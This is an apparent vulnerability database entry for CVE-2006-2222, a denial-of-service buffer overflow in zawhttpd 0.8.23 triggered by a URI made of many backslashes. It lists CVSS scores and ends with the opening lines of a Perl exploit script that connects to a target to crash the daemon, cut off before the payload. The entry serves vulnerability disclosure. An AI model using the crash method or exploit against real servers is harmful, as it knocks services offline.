5
CVSSv2

CVE-2006-2222

Published: 05/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Buffer overflow in zawhttpd 0.8.23, and possibly previous versions, allows remote malicious users to cause a denial of service (daemon crash) via a request for a URI composed of several "\" (backslash) characters.

Vulnerable Product Search on Vulmon Subscribe to Product

norz zawhttpd 0.8.23

Exploits

#!/usr/bin/perl # zawhttpd Buffer Overflow Exploit # by Kamil 'K3' Sienicki use IO::Socket; use strict; my($socket) = ""; if($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => "TCP")) { print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...